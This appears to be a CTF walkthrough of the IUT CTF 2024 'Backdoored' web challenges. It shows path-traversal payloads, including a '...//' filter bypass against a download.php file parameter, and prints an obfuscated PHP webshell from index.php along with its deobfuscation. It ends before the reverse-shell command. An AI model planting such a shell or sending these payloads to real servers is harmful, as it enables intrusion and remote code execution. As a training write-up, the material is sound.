IUT CTF 2024 - Backdoored Walkthrough
May 09, 2024
Assalamu Alaikum. Hey there, I'm Robiul Awal Fagun aka 0xRobiul, and you all know: "I'm alone, I'm Infinity, I'm From 0xInfinity!".
Let's jump in...
Backdoored-1:
First things first: as always, I started by looking all around the source code, and I found the first flag in a JavaScript file named main.js, at /static/js/main.js.
I also found something interesting just below the flag, as you can see.
Let's move on to the next one.
Backdoored-2:
As I found something interesting in the previous challenge, I started from there.
After taking a look at it, the first thing that came to mind was Local File Inclusion (LFI): download.php allows downloading a file, and the file= parameter contains the name of the file to be downloaded.
As the challenge description said to check a server-side file, I started by looking for the very download.php that I was currently in.
So I started sending payloads after /download.php?file=, like:
```
download.php
../../download.php
Li4vLi4vZG93bmxvYWQucGhwCg== (Base64 Encoded)
```
After trying the same type of payload, I moved on to LFI bypass techniques and finally succeeded with the payload `...//download.php`, which I sent as `/download.php?file=Li4uLy9kb3dubG9hZC5waHAK`; that returned the flag.
Backdoored-3:
They mentioned a backdoor injected in a server-side file, but there wasn't anything suspicious in download.php, so I started looking for the backdoor and found it with the same payload in the index.php file. It looks like:
After hunting on GitHub I found it's a backtick shell and it's obfuscated:
````<?php $_=``.[];$__=@$_;$_= $__[0]; $_1 = $__[2]; $_1++;$_1++;$_1++;$_1++;$_1++;$_1++;$_++;$_++;$_0 = $_;$_++;$_2 = ++$_; $_55 = '_'.(','^'|').('/'^'`').('-'^'~').(')'^'}'); $_ = $_2.$_1.$_2.$_0; $_($$_55[_]);?>````
This part of the code shows the parameter I'm about to use:
Obfuscated:
````$_($$_55[_]); ````
Deobfuscated:
````$_($_POST[_])````
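How the sample resolves to a callable name and a superglobal can be checked statically, without running the PHP. The Python below is an added example, not part of the original write-up; the function names `fold_xor_literals`, `php_increment` and `recover_callable` are assumptions made here, and the increment helper assumes letters only.

```python
import re

# The XOR expression assigned to $_55 in the sample, kept as inert text (never executed).
XOR_EXPR = "'_'.(','^'|').('/'^'`').('-'^'~').(')'^'}')"

def fold_xor_literals(expr: str) -> str:
    """Resolve ('a'^'b') character pairs, then join the '.'-concatenated literals."""
    expr = re.sub(r"\('(.)'\^'(.)'\)",
                  lambda m: "'" + chr(ord(m.group(1)) ^ ord(m.group(2))) + "'",
                  expr)
    return "".join(re.findall(r"'([^']*)'", expr))

def php_increment(s: str) -> str:
    """PHP's ++ on an alphabetic string: 'r' -> 's', 'z' -> 'aa', 'Az' -> 'Ba'."""
    chars = list(s)
    i = len(chars) - 1
    while i >= 0:
        if chars[i] in "zZ":                  # wrap and carry to the left
            chars[i] = "a" if chars[i] == "z" else "A"
            i -= 1
        else:
            chars[i] = chr(ord(chars[i]) + 1)
            return "".join(chars)
    return chars[0] + "".join(chars)          # every position wrapped: grow by one

def recover_callable() -> str:
    """Replay the sample's assignments to rebuild the function name it calls."""
    base = "Array"              # what PHP yields when an array is concatenated to a string
    a, r = base[0], base[2]     # $_ = $__[0];  $_1 = $__[2];
    for _ in range(6):          # $_1++ six times
        r = php_increment(r)
    a = php_increment(php_increment(a))   # $_++; $_++;
    v0 = a                      # $_0 = $_;
    a = php_increment(a)        # $_++;
    a = php_increment(a)        # $_2 = ++$_;
    v2 = a
    return v2 + r + v2 + v0     # $_ = $_2.$_1.$_2.$_0;

if __name__ == "__main__":
    print("superglobal name:", fold_xor_literals(XOR_EXPR))
    print("callable name   :", recover_callable())
```

PHP function names are case-insensitive, so the mixed-case name recovered here resolves to the built-in `exec`, and `$$_55` is a variable variable that dereferences to `$_POST`.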
I used my VPS to catch the callback from the reverse shell and used this command: